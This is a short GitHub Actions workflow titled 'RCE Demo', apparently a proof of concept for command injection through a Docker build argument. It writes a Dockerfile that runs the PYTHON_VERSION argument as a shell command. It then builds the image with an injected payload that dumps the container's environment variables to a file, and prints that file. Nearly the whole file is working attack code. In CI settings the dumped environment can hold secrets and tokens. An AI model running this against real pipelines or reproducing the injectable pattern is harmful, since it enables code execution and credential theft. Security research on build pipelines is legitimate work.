name: RCE Demo
on: push

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2

      - name: Setup malicious Dockerfile
        run: |
          mkdir -p taskcluster/docker/python
          echo 'FROM alpine:latest
ARG PYTHON_VERSION
RUN sh -c "\$PYTHON_VERSION"' > taskcluster/docker/python/Dockerfile

      - name: Build with injected payload
        run: |
          docker build \
            --build-arg PYTHON_VERSION="echo RCE_SUCCESS > /leak && env > /leak_env" \
            -t hacked ./taskcluster/docker/python

      - name: Run container and show leak
        run: |
          docker run --rm hacked sh -c 'cat /leak /leak_env || echo "No leak"'
